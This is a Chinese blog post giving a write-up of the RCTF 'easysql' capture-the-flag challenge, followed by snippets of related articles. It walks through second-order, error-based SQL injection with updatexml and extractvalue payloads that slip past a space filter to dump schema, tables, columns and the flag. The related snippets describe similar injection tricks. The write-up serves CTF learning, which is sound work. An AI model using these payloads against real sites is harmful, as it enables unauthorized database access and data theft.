Rctf easysql 题解

最新推荐文章于 2024-02-25 11:38:44 发布
最新推荐文章于 2024-02-25 11:38:44 发布
阅读量1.7k 收藏 1
点赞数
分类专栏: ctf的wp 文章标签: 数据库 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/niexinming/article/details/49966413
版权




这是一个二次注入,就是用户注册之后没有做检查直接将用户名带入数据库,改密码的时候将用户名完整带出,如果我们注册heheda\ 则在修改密码的时候数据库报错:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"heheda\" and pwd='202cb962ac59075b964b07152d234b70'' at line 1

这个时候我们再去注册其他的用户名,我们发现他过滤了and ,<>,空格,/**/,我们只能用()代替空格进行查询:

首先查数据库版本:
注册一个这样的用户名:
heheda"&&(1=(updatexml(1,concat(0x5e24,(select(version())),0x5e24),1)))#

报错:
XPATH syntax error: '^$5.1.73^$'

数据库名字:

heheda"&&(1=(updatexml(1,concat(0x5e24,(SELECT(group_concat(SCHEMA_NAME))FROM(information_schema.SCHEMATA)),0x5e24),1)))#

报错:
XPATH syntax error: '^$information_schema,web_sqli^$'

这里我要简单说明一下 group_concat的作用:
group_concat()会计算哪些行属于同一组,将属于同一组的列显示出来。要返回哪些列,由函数参数(就是字段名)决定

例如:select group_concat(User),* from user;
结果是:
+-------------------------------------------------+
| group_concat(User) |
+-------------------------------------------------+
| root,root,debian-sys-maint,phpmyadmin,root,root |
+-------------------------------------------------+


这样就可以一次查询多个值了


下面爆表:

heheda"&&(1=(updatexml(1,concat(0x5e24,(SELECT(group_concat(table_name))FROM(information_schema.tables)where(table_schema=0x7765625f73716c69)),0x5e24),1)))#

报错内容:XPATH syntax error: '^$article,flag,users^$'

爆users表的字段:

heheda"&&(1=(updatexml(1,concat(0x5e24,(SELECT(group_concat(COLUMN_NAME))FROM(Information_schema.columns)where(TABLE_SCHEMA=0x7765625f73716c69)&&(table_Name=0x7573657273)),0x5e24),1)))#

报错:
XPATH syntax error: '^$name,pwd,email,real_flag_1s_he'


发现没有爆完整:

我们排除掉几个字段继续:

heheda"&&(1=(updatexml(1,concat(0x5e24,(SELECT(group_concat(COLUMN_NAME))FROM(Information_schema.columns)where(TABLE_SCHEMA=0x7765625f73716c69)&&(table_Name=0x7573657273)&&(COLUMN_NAME!=0x6e616d65)&&(COLUMN_NAME!=0x656d61696c)),0x5e24),1)))#

报错:

XPATH syntax error: '^$pwd,real_flag_1s_here^$'

这回还不错

爆数据:

heheda"&&(1=(updatexml(1,concat(0x5e24,(SELECT(group_concat(real_flag_1s_here))FROM(users)),0x5e24),1)))#

报错:
XPATH syntax error: '^$xxx,xxx,xxx,xxx,xxx,xxx,xxx,RC'

发现有干扰数据:xxx

然后去掉干扰,换个姿势继续:

heheda"&&(extractvalue(1,concat(0x3a,((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here!=0x787878))))))#

报错:

XPATH syntax error: ':RCTF{sql_1njecti0n_is_f4n_6666}'


以上都是赛后借鉴大牛的wp写出来的,大牛的wp里面有的内容不太完整,我自己亲自实践,完善了整个过程,优化了一点查询语句,

niexinming
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
C#中的Easy SQL-CE Access Utility
04-11
仅使用C#中的一行代码即可访问任何SQL Server Compact Edition数据表中的数据
【极客大挑战 2019】EasySQL
Knsec
05-13 8267
[极客大挑战 2019] EasySQL 判断是数字还是字符型注入 正常查询的回显 输入字符型判断一下,发现报错了,看报错显示 ‘1’‘’,输入的是1’,这里查询语句中应该是存在一个单引号的,所以这里报错了,多了一个单引号,说明这里存在字符型的注入,先用万能钥匙测测 使用万能钥匙一测,第一次 正常回显错误,然后又用字符型的测了一下,发现这里的报错中带有 一部分的查询语句 # 万能公式 1 and 1=1 1' and '1'='1 1 or 1=1 1' or '1'='1
[RCTF2015]EasySQL1 题目分析与详解
最新发布
2302_79800344的博客
02-25 721
利用二次注入和报错注入处理问题。
[suctf 2019]EasySQL
qq_61988806的博客
04-25 974
这里先对输入内容进行尝试我们发现输入字符串页面不会回显猜测当输入为字符串不会执行我们测试输入数字发现为1及1以上的时候回显输入0无回显我们大概知道查询语句带上||运算符||运算符和or作用一样及||两边有一边为true则语句顺利执行按照我们的输入知道||右边为0也就是flase那我们不知道||右边的语句先构造*,1 代表查询所以内容 这里没有from 所以我们也就是试一试这就之间出来了,所以我们知道||右边是flag from flag。
[SUCTF 2019]EasySQL
记录学习,一起进步
01-13 1624
[SUCTF 2019]EasySQL
[RCTF2015]EasySQL
feng的博客
12-12 826
知识点 二次注入 报错注入 WP 一道距离现在有点久的SQL注入题目,不过做起来还是学习到了很多东西。 进入环境稍微分析一下,可以发现存在注册,登录,查看用户信息,更改密码和查看文章这些功能。从题目就可以知道,这是一道SQL注入题目,要么就是注入出用户名和密码然后登录得到flag,要么就是flag在数据库里。但是怎么找注入点是一个难事。 我试了很久还是没能找到,最后看了WP。还是自己SQL注入学的太菜了,我接触过的二次注入要么是给源码,然后审源码审出二次注入,要么就是类似那种用户名回显的二次注入,这种改
PAT甲级所有题解代码
02-03
这里包含了179道PAT甲级的代码AC题解,供有需要通过PAT考试的同学下载学习使用。
洛谷CF1458B题解
02-05
有关CF1458B的题解
snail codewar题解
02-19
snail codewar题解
CQOI2018简要题解
04-04
CQOI2018题解
VB程序设计题解.doc
11-30
VB程序设计题解.doc
easy_sql
qq_73861475的博客
09-06 299
3、判断数据回显位置 -1 union select 1,2,3,4,5.... //参数等号后面加-表示不显示当前数据。特殊符号注释:通过使用特殊符号来实现注释,例如在MySQL中,可以使用"#"符号来注释掉后面的内容。分段注释:可以通过在SQL语句中间添加注释符号来隐藏攻击代码,例如使用")--"或")/*"。尝试联合查询注入,1' union select 1,2#,发现被过滤了。多行注释:使用"/* */"符号,其中的内容将被注释掉。1、判断有无闭合 ,1,1‘,1’#
easy_sql解析
qq_73722777的博客
03-08 381
获得列名,但是其中不包含flag项。先尝试打开username和password列查看数据。进入页面,我们看到网页标题为管理员后台,尝试使用万能密码进行登录。回显输入为3时可以正常登录,回显为4显示错误,推测回显位为3。登录后发现登录成功,网页有回显,尝试进行sql注入。网址回显错误,猜测空格被屏蔽,使用/**/代替尝试。获得表名为bighacker,users。爆数据后未发现flag,于是尝试从另一个表入手。获得库名为yunxi_exam,进行爆表名。获得flag,此题结束。得到列名,尝试爆数据。
[SUCTF 2019]EasySQL1
m0_62959190的博客
07-04 582
预期解通过堆叠注入将sql_mode的值设置为PIPES_AS_CONCAT,从而将 || 视为字符串的连接操作符而非或运算符,所以构造出来。本人也是小白,看了一些大佬写的文章,不知道怎样判断出堆叠注入的,可能出现数组就能判断为堆叠注入吧,有清楚的小伙伴,可评论告诉我这个小菜鸡。就是一堆sql语句一起执行,语句中一个;表示语句结束,用多个语句连接到一起执行。mysql_multi_query() #从这个函数可以看出是堆叠注入,后端源码。这样在进行查询的时候将||运算符当成连接符成这样的语句。
题解
06-01
这道题是一道典型的费用限制最短路题目,可以使用 Dijkstra 算法或者 SPFA 算法来解决。 具体思路如下: 1. 首先,我们需要读入输入数据。输入数据中包含了道路的数量、起点和终点,以及每条道路的起点、终点、长度和限制费用。 2. 接着,我们需要使用邻接表或邻接矩阵来存储图的信息。对于每条道路,我们可以将其起点和终点作为一个有向边的起点和终点,长度作为边权,限制费用作为边权的上界。 3. 然后,我们可以使用 Dijkstra 算法或 SPFA 算法求解从起点到终点的最短路径。在这个过程中,我们需要记录到每个点的最小费用和最小长度,以及更新每条边的最小费用和最小长度。 4. 最后,我们输出从起点到终点的最短路径长度即可。 需要注意的是,在使用 Dijkstra 算法或 SPFA 算法时,需要对每个点的最小费用和最小长度进行松弛操作。具体来说,当我们从一个点 u 经过一条边 (u,v) 到达另一个点 v 时,如果新的费用和长度比原来的小,则需要更新到达 v 的最小费用和最小长度,并将 v 加入到优先队列(Dijkstra 算法)或队列(SPFA 算法)中。 此外,还需要注意处理边权为 0 或负数的情况,以及处理无法到达终点的情况。 代码实现可以参考以下样例代码: ```c++ #include <cstdio> #include <cstring> #include <queue> #include <vector> using namespace std; const int MAXN = 1005, MAXM = 20005, INF = 0x3f3f3f3f; int n, m, s, t, cnt; int head[MAXN], dis[MAXN], vis[MAXN]; struct Edge { int v, w, c, nxt; } e[MAXM]; void addEdge(int u, int v, int w, int c) { e[++cnt].v = v, e[cnt].w = w, e[cnt].c = c, e[cnt].nxt = head[u], head[u] = cnt; } void dijkstra() { priority_queue<pair<int, int>, vector<pair<int, int>>, greater<pair<int, int>>> q; memset(dis, 0x3f, sizeof(dis)); memset(vis, 0, sizeof(vis)); dis[s] = 0; q.push(make_pair(0, s)); while (!q.empty()) { int u = q.top().second; q.pop(); if (vis[u]) continue; vis[u] = 1; for (int i = head[u]; i != -1; i = e[i].nxt) { int v = e[i].v, w = e[i].w, c = e[i].c; if (dis[u] + w < dis[v] && c >= dis[u] + w) { dis[v] = dis[u] + w; q.push(make_pair(dis[v], v)); } } } } int main() { memset(head, -1, sizeof(head)); scanf("%d %d %d %d", &n, &m, &s, &t); for (int i = 1; i <= m; i++) { int u, v, w, c; scanf("%d %d %d %d", &u, &v, &w, &c); addEdge(u, v, w, c); addEdge(v, u, w, c); } dijkstra(); if (dis[t] == INF) printf("-1\n"); else printf("%d\n", dis[t]); return 0; } ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值